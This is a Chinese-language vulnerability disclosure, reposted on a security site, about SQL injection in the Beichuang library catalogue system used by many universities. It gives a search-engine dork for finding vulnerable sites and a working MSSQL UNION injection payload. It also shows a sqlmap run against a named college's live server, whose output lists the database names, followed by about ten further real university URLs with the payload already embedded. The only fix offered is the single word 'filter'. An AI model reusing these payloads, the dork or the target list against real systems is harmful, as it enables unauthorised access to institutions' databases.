频道栏目
首页 > 安全 > 网站安全 > 正文
北创图书检索系统SQL注入漏洞之一
2014-12-12 10:22:32         来源:路人甲  
收藏   我要投稿

北创图书检索系统某处过滤不严导致SQL注入,影响众多高校


百度搜索:inurl:/opac_two/search2
 

1.png

 


注入链接: /opac_two/search2/shelves_checkout.jsp?library_id= &rec_ctrl_id=
注入参数: rec_ctrl_id
Payload: library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--  (基于mssql数据库

 

 


以北京女子学院http://219.242.31.130:8080/opac_two/作为测试案例
测试链接: http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665
(1)UNION注入
http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--

 

1.png


(2)sqlmap注入
 

$ py sqlmap.py -u 'http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --random-agent --dbs -v 1 --batch
---
Place: GET
Parameter: rec_ctrl_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8430=8430 AND 'LBSb'='LBSb

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: library_id=A&rec_ctrl_id=0195033665' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(99)+CHAR(112)+CHAR(113)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(89)+CHAR(

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8352=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sy
---
[18:13:54] [INFO] testing Microsoft SQL Server
[18:13:54] [INFO] confirming Microsoft SQL Server
[18:14:00] [WARNING] reflective value(s) found and filtering out
[18:14:10] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server Unknown
[18:14:14] [INFO] fetching database names
available databases [6]:
[*] master
[*] melinets
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb

 

2.png

 


其他测试案例:(基于mssql数据库
(1)http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 

 

1.png


py sqlmap.py -u 'http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --technique=U --union-cols=9 --dbms mssql --dbs --batch

2.png


(2)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

3.png


(3)http://219.218.26.4:85/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

4.png


(4)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

5.png


(5)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

6.png


(6)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

7.png


(7)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

8.png


(8)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

9.png


(9)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

10.png


(10)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

11.png

 

 

解决方案:

过滤

 

点击复制链接 与好友分享!回本站首页
上一篇:中兴某产品web控制台存在SQL注入
下一篇:大米cms暴力getshell
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站